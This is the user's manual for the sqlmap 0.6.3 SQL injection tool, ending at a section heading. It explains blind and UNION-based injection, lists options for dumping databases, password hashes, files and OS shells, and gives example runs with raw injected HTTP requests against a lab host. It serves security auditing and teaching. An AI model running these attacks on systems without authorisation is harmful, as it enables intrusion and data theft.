<!doctype linuxdoc system>

<article>

<title>sqlmap user's manual

<author>by <htmlurl url="mailto:bernardo.damele@gmail.com" name="Bernardo Damele A. G.">

<date>version 0.6.3, 18th of December 2008

<abstract>

This document is the user's manual to use <htmlurl url="http://sqlmap.sourceforge.net" name="sqlmap">.

Check the project <htmlurl url="http://sqlmap.sourceforge.net" name="homepage">

for the latest version.

</abstract>

<toc>

<sect>Introduction

<p>

sqlmap is an automatic <htmlurl url="http://www.google.com/search?q=SQL+injection"

name="SQL injection"> tool. Its goal is to detect and take advantage of

SQL injection vulnerabilities on web applications. Once it detects one or

more SQL injections on the target host, the user can choose among a

variety of options to perform an extensive back-end database management

system fingerprint, retrieve DBMS session user and database, enumerate

users, password hashes, privileges, databases, dump entire or user's

specific DBMS tables/columns, run his own SQL <tt>SELECT</tt> statement,

read specific files on the file system and much more.

<sect1>Requirements

<p>

sqlmap is developed in <htmlurl url="http://www.python.org" name="Python">,

a dynamic object-oriented interpreted programming language.

This makes the tool independent from the operating system since it only

requires the Python interpreter version equal or above to 2.4.

The interpreter is freely downloadable from its

<htmlurl url="http://python.org/download/" name="official site">.

To make it even easier, many GNU/Linux distributions come out of the box

with Python interpreter package installed and other Unices and MacOS X

too provide it packaged in their formats and ready to be installed.

Windows users can download and install the Python setup-ready installer

for x86, AMD64 and Itanium too.

Optionally, if you are running sqlmap on Windows, you may wish to install

<htmlurl url="http://ipython.scipy.org/moin/PyReadline/Intro" name="PyReadline">

library to be able to take advantage of the sqlmap TAB completion and

history support functionalities in the SQL shell and OS shell.

Note that these functionalities are available natively by Python official

readline library on other operating systems.

You can also choose to install <htmlurl url="http://psyco.sourceforge.net/" name="Psyco">

library to speed up the sqlmap algorithmic operations.

<sect1>Scenario

<p>

Let's say that you are auditing a web application and found a web page

that accepts dynamic user-provided values on <tt>GET</tt> or <tt>POST</tt>

parameters or HTTP <tt>Cookie</tt> values or HTTP <tt>User-Agent</tt>

header value.

You now want to test if these are affected by a SQL injection

vulnerability, and if so, exploit them to retrieve as much information as

possible out of the web application's back-end database management system

or even be able to access the underlying operating system.

Consider that the target url is:

<tscreen><tt>http://192.168.1.121/sqlmap/mysql/get_int.php?id=1</tt></tscreen>

Assume that:

<tscreen><tt>http://192.168.1.121/sqlmap/mysql/get_int.php?id=1+AND+1=1</tt></tscreen>

is the same page as the original one and:

<tscreen><tt>http://192.168.1.121/sqlmap/mysql/get_int.php?id=1+AND+1=2</tt></tscreen>

differs from the original one, it means that you are in front of a SQL

injection vulnerability in the <tt>id</tt> <tt>GET</tt> parameter of the

<tt>index.php</tt> web application page which means that no IDS/IPS, no

web application firewall, no parameters' value sanitization is performed

on the server-side.

This is a quite common flaw in dynamic content web applications and it

does not depend upon the back-end database management system nor on the web

application programming language: it is a programmer code's security flaw.

The <htmlurl url="http://www.owasp.org" name="Open Web Application Security Project">

rated on 2007 in their <htmlurl url="http://www.owasp.org/index.php/Top_10_2007"

name="OWASP Top Ten"> survey this vulnerability as the <htmlurl

url="http://www.owasp.org/index.php/Top_10_2007-A2" name="most

common"> and important web application vulnerability, second only to

<htmlurl url="http://www.owasp.org/index.php/Top_10_2007-A1"

name="Cross-Site Scripting">.

Back to the scenario, probably the SQL <tt>SELECT</tt> statemenet into

<tt>get_int.php</tt> has a syntax similar to the following SQL query, in

pseudo PHP code:

<tscreen><tt>

$query = "SELECT &#91;column(s) name&#93; FROM &#91;table name&#93; WHERE id=" . $_REQUEST['id'];

</tt></tscreen>

As you can see, appending any other syntatically valid SQL condition after

a value for <tt>id</tt> such condition will take place when the web

application passes the query to the back-end database management system

that executes it, that is why the condition <tt>id=1 AND 1=1</tt> is valid

(<em>True</em>) and returns the same page as the original one, with the

same content and without showing any SQL error message.

Moreover, in this simple and easy to inject scenario it would be also

possible to append, not just one or more valid SQL condition(s), but also

stacked SQL queries, for instance something like <tt>[...]&amp;id=1;

ANOTHER SQL QUERY#</tt> if the web application technology supports

<em>stacked queries</em>, also known as <em>multiple statements</em>.

Now that you found this SQL injection vulnerable parameter, you can

exploit it by manipulating the <tt>id</tt> parameter value in the HTTP

request.

There exist many <htmlurl url="http://delicious.com/inquis/sqlinjection" name="resources">

on the Net explaining in depth how to prevent, how to detect and how to

exploit SQL injection vulnerabilities in web application and it is

recommended to read them if you are not familiar with the issue before

going ahead with sqlmap.

Passing the original address, <tt>http://192.168.1.121/sqlmap/mysql/get_int.php?id=1</tt>

to sqlmap, the tool will automatically:

<itemize>

<item>Identify the vulnerable parameter(s) (<tt>id</tt> in this scenario);

<item>Depending on the user's options, sqlmap uses the <bf>blind SQL

injection</bf> or the <bf>inband SQL injection</bf> technique as described

in the following section to go ahead with the exploiting.

</itemize>

<sect1>Techniques

<p>

sqlmap implements two techniques to exploit a SQL injection vulnerability:

<itemize>

<item><bf>Blind SQL injection</bf>, also known as <bf>Inferential Blind SQL

injection</bf> in this implementation: sqlmap appends to the affected

parameter in the HTTP request, a syntatically valid SQL statement string

containing a <tt>SELECT</tt> sub-statement, or any other SQL statement

whose the user want to retrieve the output.

For each HTTP response, by making a comparison based upon HTML page

content hashes, or string matches, with the original request, the tool

determines the output value of the statement character by character.

The bisection algorithm implemented in sqlmap to perform this technique

is able to fetch each output character with at maximum seven HTTP

requests.

This is sqlmap default SQL injection technique.

<item><bf>Inband SQL injection</bf>, also known as <bf>Full UNION query SQL

injection</bf>: sqlmap appends to the affected parameter in the HTTP

request, a syntatically valid SQL statement string starting with a

<tt>UNION ALL SELECT</tt>. This techique is useful if the web application

page passes the output of the <tt>SELECT</tt> statement to a <tt>for</tt>

cycle, or similar, so that each line of the query output is printed on the

page content.

sqlmap is also able to exploit <bf>Partial UNION query SQL injection</bf>

vulnerabilities which occur when the output of the statement is not cycled

in a for construct whereas only the first entry output is displayed.

This technique is much faster if the target url is affected by because

in a single HTTP response it returns the whole query output or a entry

per each response within the page content.

This SQL injection technique is an alternative to the first one.

</itemize>

It is strongly recommended to run at least once sqlmap with the

<tt>--union-test</tt> option to test if the affected parameter is used

within a <tt>for</tt> cycle, or similar, and in case use

<tt>--union-use</tt> option to exploit this vulnerability because it

saves a lot of time and it does not weight down the web server log file

with hundreds of HTTP requests.

<sect>Features

<p>

Major features implemented in sqlmap include:

<itemize>

<item>Full support for <bf>MySQL</bf>, <bf>Oracle</bf>, <bf>PostgreSQL</bf>

and <bf>Microsoft SQL Server</bf> back-end database management systems.

Besides these four database management systems, sqlmap can also identify

Microsoft Access, DB2, Informix, Sybase and Interbase.

<item><bf>Extensive back-end database management system fingerprint</bf>

based upon

<htmlurl url="http://bernardodamele.blogspot.com/2007/06/database-management-system-fingerprint.html" name="inband error messages">,

<htmlurl url="http://bernardodamele.blogspot.com/2007/06/database-management-system-fingerprint.html" name="banner parsing">,

<htmlurl url="http://bernardodamele.blogspot.com/2007/07/more-on-database-management-system.html" name="functions output comparison"> and

<htmlurl url="http://bernardodamele.blogspot.com/2007/07/more-on-database-management-system.html" name="specific features">

such as MySQL comment injection. It is also possible to force the back-end

database management system name if you already know it. sqlmap is also able

to fingerprint the web server operating system, the web application

technology and, in some circumstances, the back-end DBMS operating system.

<item>Full support for two SQL injection techniques: <bf>blind SQL

injection</bf> and <bf>inband SQL injection</bf>. sqlmap can also test for

<bf>Time based blind SQL injection</bf>.

<item>Options to retrieve on all four back-end database management system

<bf>banner</bf>, <bf>current user</bf>, <bf>current database</bf>,

enumerate <bf>users</bf>, <bf>users password hashes</bf>, <bf>users

privileges</bf>, <bf>databases</bf>, <bf>tables</bf>, <bf>columns</bf>,

dump <bf>tables entries</bf>, dump <bf>whole database management

system</bf> and run your <bf>own SQL <tt>SELECT</tt> statement</bf>.

<item>If the back-end database management system is MySQL it is also

possible to <bf>read a specific file content</bf> from the ile system and,

in some circumstances, <bf>prompt for an interactive operating system

shell</bf> with TAB completion and history support.

<item>It is possible to provide a single target URL, get the list of

targets from <htmlurl url="http://portswigger.net/suite/" name="Burp proxy">

requests log file path or

<htmlurl url="http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project" name="WebScarab proxy">

<tt>conversations/</tt> folder path or get the list of targets by providing

sqlmap with a Google dork which queries

<htmlurl url="http://www.google.com" name="Google"> search engine and

parses its results page.

<item>Automatically tests all provided <bf>GET</bf> parameters,

<bf>POST</bf> parameters, HTTP <bf>Cookie</bf> header values and HTTP

<bf>User-Agent</bf> header value to find the dynamic ones, which means

those that vary the HTTP response page content.

On the dynamic ones sqlmap automatically tests and detects the ones

affected by SQL injection. Each dynamic parameter is tested for

<em>numeric</em>, <em>single quoted string</em>, <em>double quoted

string</em> and all of these three datatypes with zero to two parenthesis

to correctly detect which is the <tt>SELECT</tt> statement syntax to

perform further injections with. It is also possible to specify the

parameter(s) that you want to perform tests and use for injection on.

<item>Option to specify the <bf>maximum number of concurrent HTTP

requests</bf> to speed up the blind SQL injection algorithms

(multithreading). It is also possible to specify the number of seconds to

wait between each HTTP request.

<item><bf>HTTP <tt>Cookie</tt> header</bf> string support, useful when the

web application requires authentication based upon cookies and you have

such data or in case you just want to test for and exploit SQL injection

on such header.

<item>Automatically handle <bf>HTTP <tt>Set-Cookie</tt> header</bf> from

target url, re-establishing of the session if it expires. Test and exploit

on these values is supported too.

<item><bf>HTTP Basic and Digest authentications</bf> support.

<item><bf>Anonymous HTTP proxy</bf> support to pass by the requests to the

target URL that works also with HTTPS requests.

<item>Options to fake the <bf>HTTP <tt>Referer</tt> header</bf> value and

the <bf>HTTP <tt>User-Agent</tt> header</bf> value specified by user or

randomly selected from a text file.

<item>Support to increase the <bf>verbosity level of output messages</bf>:

there exist <bf>six levels</bf>. The default level is <bf>1</bf> in which

information, warnings, errors and tracebacks, if they occur, will be shown.

<item><bf>Estimated time of arrival</bf> support for each query, updated

in real time while fetching the information to give to the user an

overview on how long it will take to retrieve the output.

<item>Support to save the session (queries and their output, even if

partially retrieved) in real time while fetching the data on a text file

and <bf>resume the injection from this file in a second time</bf>.

<item>Support to read options from a configuration INI file rather than

specify each time all of the options on the command line. Support also to

save command line options on a configuration INI file.

<item>Integration with other IT security related open source projects,

<htmlurl url="http://metasploit.com/framework/" name="Metasploit"> and <htmlurl

url="http://w3af.sourceforge.net/" name="w3af">.

<item><bf>PHP setting <tt>magic_quotes_gpc</tt> bypass</bf> by encoding

every query string, between single quotes, with <tt>CHAR</tt>, or similar,

database management system function.

</itemize>

<sect>Download and update

<p>

sqlmap can be downloaded from its

<htmlurl url="http://sourceforge.net/project/showfiles.php?group_id=171598&amp;package_id=196107"

name="SourceForge File List page">.

It is available in various formats:

<itemize>

<item><htmlurl url="http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.3.tar.gz"

name="Source gzip compressed"> operating system independent.

<item><htmlurl url="http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.3.tar.bz2"

name="Source bzip2 compressed"> operating system independent.

<item><htmlurl url="http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.3.zip"

name="Source zip compressed"> operating system independent.

<item><htmlurl url="http://downloads.sourceforge.net/sqlmap/sqlmap_0.6.3-1_all.deb"

name="DEB binary package"> architecture independent for Debian and any

other Debian derivated GNU/Linux distribution.

<item><htmlurl url="http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.3-1.noarch.rpm"

name="RPM binary package"> architecture independent for Fedora and any

other operating system that can install RPM packages.

<item><htmlurl url="http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.3_exe.zip"

name="Portable executable for Windows"> that <bf>does not require the Python

interpreter</bf> to be installed on the operating system.

</itemize>

<p>

Whatever way you downloaded sqlmap, run it with <tt>&#45;&#45;update</tt>

option to update it to the latest stable version available on its

<htmlurl url="http://sourceforge.net/project/showfiles.php?group_id=171598&amp;package_id=196107"

name="SourceForge File List page">.

<p>

You can also checkout the source code from the sqlmap

<htmlurl url="https://svn.sqlmap.org/sqlmap/trunk/sqlmap/" name="Subversion">

repository to give a try to the development release:

<tscreen><verb>

$ svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev

</verb></tscreen>

<sect>License and copyright

<p>

sqlmap is released under the terms of the

<htmlurl url="http://www.gnu.org/licenses/old-licenses/gpl-2.0.html" name="General Public License v2">.

sqlmap is copyrighted by

<htmlurl url="mailto:bernardo.damele@gmail.com" name="Bernardo Damele A. G.">

and <htmlurl url="mailto:daniele.bellucci@gmail.com" name="Daniele Bellucci">.

<sect>Usage

<p>

<tscreen><verb>

$ python sqlmap.py -h

sqlmap/0.6.3 coded by Bernardo Damele A. G. <bernardo.damele@gmail.com>

and Daniele Bellucci <daniele.bellucci@gmail.com>

Usage: sqlmap.py [options]

Options:

--version show program's version number and exit

-h, --help show this help message and exit

Target:

At least one of these options has to be specified to set the source to

get target urls from.

-u URL, --url=URL Target url

-l LIST Parse targets from Burp or WebScarab logs

-g GOOGLEDORK Process Google dork results as target urls

-c CONFIGFILE Load options from a configuration INI file

Request:

These options can be used to specify how to connect to the target url.

--method=METHOD HTTP method, GET or POST (default: GET)

--data=DATA Data string to be sent through POST

--cookie=COOKIE HTTP Cookie header

--referer=REFERER HTTP Referer header

--user-agent=AGENT HTTP User-Agent header

-a USERAGENTSFILE Load a random HTTP User-Agent header from file

--headers=HEADERS Extra HTTP headers '\n' separated

--auth-type=ATYPE HTTP Authentication type, value: Basic or Digest

--auth-cred=ACRED HTTP Authentication credentials, value: name:password

--proxy=PROXY Use a HTTP proxy to connect to the target url

--threads=THREADS Maximum number of concurrent HTTP requests (default 1)

--delay=DELAY Delay in seconds between each HTTP request

--timeout=TIMEOUT Seconds to wait before timeout connection (default 10)

Injection:

These options can be used to specify which parameters to test for,

provide custom injection payloads and how to parse and compare HTTP

responses page content when using the blind SQL injection technique.

-p TESTPARAMETER Testable parameter(s)

--dbms=DBMS Force back-end DBMS to this value

--prefix=PREFIX Injection payload prefix string

--postfix=POSTFIX Injection payload postfix string

--string=STRING String to match in page when the query is valid

--regexp=REGEXP Regexp to match in page when the query is valid

--excl-str=ESTRING String to be excluded before calculating page hash

--excl-reg=EREGEXP Regexp matches to be excluded before calculating page

hash

Techniques:

These options can be used to test for specific SQL injection technique

or to use one of them to exploit the affected parameter(s) rather than

using the default blind SQL injection technique.

--stacked-test Test for stacked queries (multiple statements) support

--time-test Test for Time based blind SQL injection

--union-test Test for UNION query (inband) SQL injection

--union-use Use the UNION query (inband) SQL injection to retrieve

the queries output. No need to go blind

Fingerprint:

-f, --fingerprint Perform an extensive DBMS version fingerprint

Enumeration:

These options can be used to enumerate the back-end database

management system information, structure and data contained in the

tables. Moreover you can run your own SQL SELECT queries.

-b, --banner Retrieve DBMS banner

--current-user Retrieve DBMS current user

--current-db Retrieve DBMS current database

--users Enumerate DBMS users

--passwords Enumerate DBMS users password hashes (opt: -U)

--privileges Enumerate DBMS users privileges (opt: -U)

--dbs Enumerate DBMS databases

--tables Enumerate DBMS database tables (opt: -D)

--columns Enumerate DBMS database table columns (req:-T opt:-D)

--dump Dump DBMS database table entries (req: -T, opt: -D,

-C, --start, --stop)

--dump-all Dump all DBMS databases tables entries

-D DB DBMS database to enumerate

-T TBL DBMS database table to enumerate

-C COL DBMS database table column to enumerate

-U USER DBMS user to enumerate

--exclude-sysdbs Exclude DBMS system databases when enumerating tables

--start=LIMITSTART First table entry to dump

--stop=LIMITSTOP Last table entry to dump

--sql-query=QUERY SQL SELECT query to be executed

--sql-shell Prompt for an interactive SQL shell

File system access:

These options can be used to access the back-end database management

system file system taking advantage of native DBMS functions or

specific DBMS design weaknesses.

--read-file=RFILE Read a specific OS file content (only on MySQL)

--write-file=WFILE Write to a specific OS file (not yet available)

Operating system access:

This option can be used to access the back-end database management

system operating system taking advantage of specific DBMS design

weaknesses.

--os-shell Prompt for an interactive OS shell (only on PHP/MySQL

environment with a writable directory within the web

server document root for the moment)

Miscellaneous:

--eta Retrieve each query output length and calculate the

estimated time of arrival in real time

-v VERBOSE Verbosity level: 0-5 (default 1)

--update Update sqlmap to the latest stable version

-s SESSIONFILE Save and resume all data retrieved on a session file

--save Save options on a configuration INI file

--batch Never ask for user input, use the default behaviour

</verb></tscreen>

<sect1>Target

<p>

At least one of these options has to be specified to set the source to get

target urls from.

<sect2>Target URL

<p>

Option: <tt>-u</tt> or <tt>--url</tt>

<p>

To run sqlmap on a single target URL.

<p>

Example on a <bf>MySQL 5.0.67</bf> target:

<tscreen><verb>

$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1"

[...]

web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)

web application technology: PHP 5.2.6, Apache 2.2.9

back-end DBMS: MySQL >= 5.0.0

</verb></tscreen>

<sect2>Target URL and verbosity

<p>

Option: <tt>-v</tt>

<p>

Verbose options can be used to set the verbosity level of output messages.

There exist six levels.

The default level is <bf>1</bf> in which information, warnings, errors and

tracebacks, if they occur, will be shown.

Level <bf>2</bf> shows also debug messages, level <bf>3</bf> shows also

HTTP requests with all HTTP headers sent, level <bf>4</bf> shows also HTTP

responses headers and level <bf>5</bf> shows also HTTP responses page

content.

<p>

Example on a <bf>MySQL 5.0.67</bf> target (verbosity level <bf>1</bf>):

<tscreen><verb>

$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" -v 1

[hh:mm:12] [INFO] testing connection to the target url

[hh:mm:12] [INFO] testing if the url is stable, wait a few seconds

[hh:mm:14] [INFO] url is stable

[hh:mm:14] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic

[hh:mm:14] [WARNING] User-Agent parameter 'User-Agent' is not dynamic

[hh:mm:14] [INFO] testing if GET parameter 'id' is dynamic

[hh:mm:14] [INFO] confirming that GET parameter 'id' is dynamic

[hh:mm:14] [INFO] GET parameter 'id' is dynamic

[hh:mm:14] [INFO] testing sql injection on GET parameter 'id' with 0 parenthesis

[hh:mm:14] [INFO] testing unescaped numeric injection on GET parameter 'id'

[hh:mm:14] [INFO] confirming unescaped numeric injection on GET parameter 'id'

[hh:mm:14] [INFO] GET parameter 'id' is unescaped numeric injectable with 0 parenthesis

[hh:mm:14] [INFO] testing for parenthesis on injectable parameter

[hh:mm:14] [INFO] the injectable parameter requires 0 parenthesis

[hh:mm:14] [INFO] testing MySQL

[hh:mm:14] [INFO] query: CONCAT(CHAR(53), CHAR(53))

[hh:mm:14] [INFO] retrieved: 55

[hh:mm:14] [INFO] performed 20 queries in 0 seconds

[hh:mm:14] [INFO] confirming MySQL

[hh:mm:14] [INFO] query: LENGTH(CHAR(53))

[hh:mm:14] [INFO] retrieved: 1

[hh:mm:14] [INFO] performed 13 queries in 0 seconds

[hh:mm:14] [INFO] query: SELECT 5 FROM information_schema.TABLES LIMIT 0, 1

[hh:mm:14] [INFO] retrieved: 5

[hh:mm:14] [INFO] performed 13 queries in 0 seconds

web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)

web application technology: PHP 5.2.6, Apache 2.2.9

back-end DBMS: MySQL >= 5.0.0

</verb></tscreen>

<p>

Example on a <bf>MySQL 5.0.67</bf> target (verbosity level <bf>2</bf>):

<tscreen><verb>

$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" -v 2

[hh:mm:03] [DEBUG] initializing the configuration

[hh:mm:03] [DEBUG] initializing the knowledge base

[hh:mm:03] [DEBUG] cleaning up configuration parameters

[hh:mm:03] [DEBUG] setting the HTTP method to GET

[hh:mm:03] [DEBUG] creating HTTP requests opener object

[hh:mm:03] [DEBUG] parsing XML queries file

[hh:mm:03] [INFO] testing connection to the target url

[hh:mm:03] [INFO] testing if the url is stable, wait a few seconds

[hh:mm:04] [INFO] url is stable

[hh:mm:04] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic

[hh:mm:04] [WARNING] User-Agent parameter 'User-Agent' is not dynamic

[hh:mm:04] [INFO] testing if GET parameter 'id' is dynamic

[hh:mm:04] [INFO] confirming that GET parameter 'id' is dynamic

[hh:mm:04] [INFO] GET parameter 'id' is dynamic

[hh:mm:04] [INFO] testing sql injection on GET parameter 'id' with 0 parenthesis

[hh:mm:04] [INFO] testing unescaped numeric injection on GET parameter 'id'

[hh:mm:04] [INFO] confirming unescaped numeric injection on GET parameter 'id'

[hh:mm:04] [INFO] GET parameter 'id' is unescaped numeric injectable with 0 parenthesis

[...]

</verb></tscreen>

<p>

Example on a <bf>MySQL 5.0.67</bf> target (verbosity level <bf>3</bf>):

<tscreen><verb>

$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" -v 3

[...]

[hh:mm:54] [INFO] testing connection to the target url

[hh:mm:54] [TRAFFIC OUT] HTTP request:

GET /sqlmap/mysql/get_int.php?id=1 HTTP/1.1

Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7

Host: 192.168.1.121:80

Accept-language: en-us,en;q=0.5

Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,

image/png,*/*;q=0.5

User-agent: sqlmap/0.6.3 (http://sqlmap.sourceforge.net)

Connection: close

[...]

[hh:mm:55] [INFO] testing MySQL

[hh:mm:55] [INFO] query: CONCAT(CHAR(54), CHAR(54))

[hh:mm:55] [TRAFFIC OUT] HTTP request:

GET /sqlmap/mysql/get_int.php?id=1%20AND%20ORD%28MID%28%28CONCAT%28CHAR%2854%29%2C%20CHAR

%2854%29%29%29%2C%201%2C%201%29%29%20%3E%2063%20AND%201104=1104 HTTP/1.1

Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7

Host: 192.168.1.121:80

Accept-language: en-us,en;q=0.5

Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,

image/png,*/*;q=0.5

User-agent: sqlmap/0.6.3 (http://sqlmap.sourceforge.net)

Connection: close

[...]

</verb></tscreen>

<p>

Example on a <bf>MySQL 5.0.67</bf> target (verbosity level <bf>4</bf>):

<tscreen><verb>

$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" -v 4

[...]

[hh:mm:44] [INFO] testing connection to the target url

[hh:mm:44] [TRAFFIC OUT] HTTP request:

GET /sqlmap/mysql/get_int.php?id=1 HTTP/1.1

Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7

Host: 192.168.1.121:80

Accept-language: en-us,en;q=0.5

Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,

image/png,*/*;q=0.5

User-agent: sqlmap/0.6.3 (http://sqlmap.sourceforge.net)

Connection: close

[hh:mm:44] [TRAFFIC IN] HTTP response (OK - 200):

Date: Thu, 11 Dec 2008 hh:mm:44 GMT

Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4 with Suhosin-Patch

X-Powered-By: PHP/5.2.6-2ubuntu4

Content-Length: 119

Connection: close

Content-Type: text/html

[...]

[hh:mm:45] [INFO] testing MySQL

[hh:mm:46] [INFO] query: CONCAT(CHAR(52), CHAR(52))

[hh:mm:46] [TRAFFIC OUT] HTTP request:

GET /sqlmap/mysql/get_int.php?id=1%20AND%20ORD%28MID%28%28CONCAT%28CHAR%2852%29%2C%20CHAR

%2852%29%29%29%2C%201%2C%201%29%29%20%3E%2063%20AND%203030=3030 HTTP/1.1

Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7

Host: 192.168.1.121:80

Accept-language: en-us,en;q=0.5

Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,

image/png,*/*;q=0.5

User-agent: sqlmap/0.6.3 (http://sqlmap.sourceforge.net)

Connection: close

[...]

</verb></tscreen>

<p>

Example on a <bf>MySQL 5.0.67</bf> target (verbosity level <bf>5</bf>):

<tscreen><verb>

$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" -v 5

[...]

[hh:mm:17] [INFO] testing connection to the target url

[hh:mm:17] [TRAFFIC OUT] HTTP request:

GET /sqlmap/mysql/get_int.php?id=1 HTTP/1.1

Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7

Host: 192.168.1.121:80

Accept-language: en-us,en;q=0.5

Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,

image/png,*/*;q=0.5

User-agent: sqlmap/0.6.3 (http://sqlmap.sourceforge.net)

Connection: close

[hh:mm:17] [TRAFFIC IN] HTTP response (OK - 200):

Date: Thu, 11 Dec 2008 hh:mm:17 GMT

Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4 with Suhosin-Patch

X-Powered-By: PHP/5.2.6-2ubuntu4

Content-Length: 119

Connection: close

Content-Type: text/html

&lt;html&gt;&lt;body&gt;

&lt;b&gt;SQL results:&lt;/b&gt;

&lt;table border="1"&gt;

&lt;tr&gt;&lt;td&gt;1&lt;/td&gt;&lt;td&gt;luther&lt;/td&gt;&lt;td&gt;blissett&lt;/td&gt;&lt;/tr&gt;

&lt;/table&gt;

&lt;/body&gt;&lt;/html&gt;

[...]

[hh:mm:18] [INFO] testing MySQL

[hh:mm:18] [INFO] query: CONCAT(CHAR(51), CHAR(51))

[hh:mm:18] [TRAFFIC OUT] HTTP request:

GET /sqlmap/mysql/get_int.php?id=1%20AND%20ORD%28MID%28%28CONCAT%28CHAR%2851%29%2C%20CHAR

%2851%29%29%29%2C%201%2C%201%29%29%20%3E%2063%20AND%202581=2581 HTTP/1.1

Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7

Host: 192.168.1.121:80

Accept-language: en-us,en;q=0.5

Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,

image/png,*/*;q=0.5

User-agent: sqlmap/0.6.3 (http://sqlmap.sourceforge.net)

Connection: close

[hh:mm:18] [TRAFFIC IN] HTTP response (OK - 200):

Date: Thu, 11 Dec 2008 hh:mm:18 GMT

Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4 with Suhosin-Patch

X-Powered-By: PHP/5.2.6-2ubuntu4

Content-Length: 75

Connection: close

Content-Type: text/html

&lt;html&gt;&lt;body&gt;

&lt;b&gt;SQL results:&lt;/b&gt;

&lt;table border="1"&gt;

&lt;/table&gt;

&lt;/body&gt;&lt;/html&gt;

[...]

</verb></tscreen>

<sect2>Parse targets from Burp or WebScarab logs

<p>

Option: <tt>-l</tt>

<p>

Rather than providing a single target URL it is possible to test and inject

on HTTP requests proxied through <htmlurl url="http://portswigger.net/suite/" name="Burp proxy">

or <htmlurl url="http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project" name="WebScarab proxy">.

<p>

Example passing to sqlmap a WebScarab proxy <tt>conversations/</tt> folder:

<tscreen><verb>

$ python sqlmap.py -l /tmp/webscarab.log/conversations/

[hh:mm:43] [INFO] sqlmap parsed 27 testable requests from the targets list

[hh:mm:43] [INFO] sqlmap got a total of 27 targets

[hh:mm:43] [INPUT] url 1:

GET http://192.168.1.121:80/phpmyadmin/navigation.php?db=test&amp;token=60747016432606019619a

c58b3780562

Cookie: PPA_ID=197bf44d671aeb7d3a28719a467d86c3; phpMyAdmin=366c9c9b329a98eabb4b708c2df8b

d7d392eb151; pmaCookieVer=4; pmaPass-1=uH9%2Fz5%2FsB%2FM%3D; pmaUser-1=pInZx5iWPrA%3D;

pma_charset=iso-8859-1; pma_collation_connection=utf8_unicode_ci; pma_fontsize=deleted;

pma_lang=en-utf-8; pma_mcrypt_iv=o6Mwtqw6c0c%3D; pma_theme=deleted

do you want to test this url? [Y/n/q] n

[hh:mm:46] [INPUT] url 2:

GET http://192.168.1.121:80/sqlmap/mysql/get_int.php?id=1

Cookie: PPA_ID=197bf44d671aeb7d3a28719a467d86c3

do you want to test this url? [Y/n/q] y

[hh:mm:49] [INFO] testing url http://192.168.1.121:80/sqlmap/mysql/get_int.php?id=1

[hh:mm:49] [INFO] testing connection to the target url

[hh:mm:49] [INFO] testing if the url is stable, wait a few seconds

[hh:mm:50] [INFO] url is stable

[hh:mm:50] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic

[hh:mm:50] [WARNING] User-Agent parameter 'User-Agent' is not dynamic

[hh:mm:50] [INFO] testing if Cookie parameter 'PPA_ID' is dynamic

[hh:mm:50] [WARNING] Cookie parameter 'PPA_ID' is not dynamic

[hh:mm:50] [INFO] testing if GET parameter 'id' is dynamic

[hh:mm:50] [INFO] confirming that GET parameter 'id' is dynamic

[hh:mm:50] [INFO] GET parameter 'id' is dynamic

[hh:mm:50] [INFO] testing sql injection on GET parameter 'id' with 0 parenthesis

[hh:mm:50] [INFO] testing unescaped numeric injection on GET parameter 'id'

[hh:mm:50] [INFO] confirming unescaped numeric injection on GET parameter 'id'

[hh:mm:50] [INFO] GET parameter 'id' is unescaped numeric injectable with 0 parenthesis

[hh:mm:50] [INPUT] do you want to exploit this SQL injection? [Y/n] y

[hh:mm:29] [INFO] testing for parenthesis on injectable parameter

[hh:mm:29] [INFO] the injectable parameter requires 0 parenthesis

[hh:mm:29] [INFO] testing MySQL

[hh:mm:29] [INFO] query: CONCAT(CHAR(57), CHAR(57))

[hh:mm:29] [INFO] retrieved: 99

[hh:mm:29] [INFO] performed 20 queries in 0 seconds

[hh:mm:29] [INFO] confirming MySQL

[hh:mm:29] [INFO] query: LENGTH(CHAR(57))

[hh:mm:29] [INFO] retrieved: 1

[hh:mm:29] [INFO] performed 13 queries in 0 seconds

[hh:mm:29] [INFO] query: SELECT 9 FROM information_schema.TABLES LIMIT 0, 1

[hh:mm:29] [INFO] retrieved: 9

[hh:mm:29] [INFO] performed 13 queries in 0 seconds

web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)

web application technology: PHP 5.2.6, Apache 2.2.9

back-end DBMS: MySQL >= 5.0.0

[...]

</verb></tscreen>

<sect2>Process Google dork results as target urls

<p>

